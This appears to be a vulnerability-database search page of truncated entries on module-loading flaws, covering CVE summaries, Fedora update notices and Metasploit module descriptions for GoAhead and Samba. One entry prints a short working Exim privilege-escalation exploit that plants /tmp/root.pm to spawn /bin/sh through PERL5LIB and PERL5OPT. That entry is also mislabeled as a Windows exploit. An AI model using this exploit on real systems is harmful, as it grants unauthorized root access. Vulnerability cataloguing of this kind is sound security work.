CVE-2018-21008

A use-after-free flaw was found in the Linux kernel's Redpine Signals driver implementation. A local attacker who is able force a module load rsisdio or usb plug/unplug could cause a system crash or memory corruption leading to privilege escalation. The highest threat from this vulnerability is t...

CVE-2011-1830

Ekiga versions before 3.3.0 attempted to load a module from /tmp/ekigatest.so...

CVE-2011-1830

Ekiga versions before 3.3.0 attempted to load a module from /tmp/ekigatest.so...

GoAhead Web Server 2.5 < 3.6.5 - HTTPd LD_PRELOAD Arbitrary Module Load Exploit

This Metasploit module triggers an arbitrary shared library load vulnerability in GoAhead web server versions between 2.5 and that have the CGI module enabled. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...

GoAhead Web Server LD_PRELOAD Arbitrary Module Load

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GoAhead Web Server LDPRELOAD Arbitrary Module Load', 'Description' = %q This module triggers an arbitrary shared library load vulnerability in...

GoAhead Web Server 2.5 &lt; 3.6.5 - HTTPd &#039;LD_PRELOAD&#039; Arbitrary Module Load (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GoAhead Web Server LDPRELOAD Arbitrary Module Load', 'Description' = %q This module triggers an arbitrary shared library load vulnerability in...

Samba is_known_pipename() Arbitrary Module Load Exploit

This Metasploit module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This Metasploit module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some...

Fedora 23 : perl-Module-Load-Conditional (2016-0aa251bc9b)

This update adds an option 'FORCESAFEINC', which, if set it isn't by default, removes the current directory from the module load path so as to avoid loading code from a potentially unsafe place CVE-2016-1238. Note that Tenable Network Security has extracted the preceding description block directl...

Fedora 24 : perl-Module-Load-Conditional (2016-dd20a4631a)

This update adds an option 'FORCESAFEINC', which, if set it isn't by default, removes the current directory from the module load path so as to avoid loading code from a potentially unsafe place CVE-2016-1238. Note that Tenable Network Security has extracted the preceding description block directl...

Fedora Update for perl-Module-Load-Conditional FEDORA-2016-dd20a4631a

The remote host is missing an update for the SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

[SECURITY] Fedora 23 Update: perl-Module-Load-Conditional-0.68-1.fc23

This module provides simple ways to query and possibly load any of the modu les you have installed on your system during run-time...

[SECURITY] Fedora 24 Update: perl-Module-Load-Conditional-0.68-1.fc24

This module provides simple ways to query and possibly load any of the modu les you have installed on your system during run-time...

Fedora 22 : xen (2016-4edd58a3b5)

cleaner way to set kernel module load list Unrestricted qemu logging XSA-180, CVE-2014-3672 1339125 Qemu: scsi: esp: OOB write while writing to 's-cmdbuf' in espregwrite CVE-2016-4439 1337502 Qemu: scsi: esp: OOB write while writing to 's-cmdbuf' in getcmd CVE-2016-4441 1337505 Qemu: scsi: megasa...

Fedora 24 : xen (2016-cfea37952b)

cleaner way to set kernel module load list Unrestricted qemu logging XSA-180, CVE-2014-3672 1339125 Qemu: scsi: esp: OOB write while writing to 's-cmdbuf' in espregwrite CVE-2016-4439 1337502 Qemu: scsi: esp: OOB write while writing to 's-cmdbuf' in getcmd CVE-2016-4441 1337505 Qemu: scsi: megasa...

Exim 4.84-3 - Privilege Escalation

Exploit for windows platform in category local exploits !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps 0day.today 2018-02-19...

kernel: crypto api unprivileged arbitrary module load via request_module()

A flaw was found in the way the Linux kernel's Crypto subsystem handled automatic loading of kernel modules. A local user could use this flaw to load any installed kernel module, and thus increase the attack surface of the running kernel...

kernel: crypto api unprivileged arbitrary module load via request_module()

A flaw was found in the way the Linux kernel's Crypto subsystem handled automatic loading of kernel modules. A local user could use this flaw to load any installed kernel module, and thus increase the attack surface of the running kernel...

kernel security and bug fix update

2.6.32-220.4.1.el6 - fs Revert 'proc: enable writing to /proc/pid/mem' Johannes Weiner 782649 782650 CVE-2012-0056 2.6.32-220.3.1.el6 - kernel Remove 'WARNING: at kernel/sched.c:5915' Larry Woodman 768288 766051 - x86 kernel: Fix memory corruption in module load Prarit Bhargava 769595 767140 -...

systemtap: signed module loading race condition

The insertmodule function in runtime/staprun/staprunfuncs.c in the systemtap runtime tool staprun in SystemTap before 1.6 does not properly validate a module when loading it, which allows local users to gain privileges via a race condition between the signature validation and the module...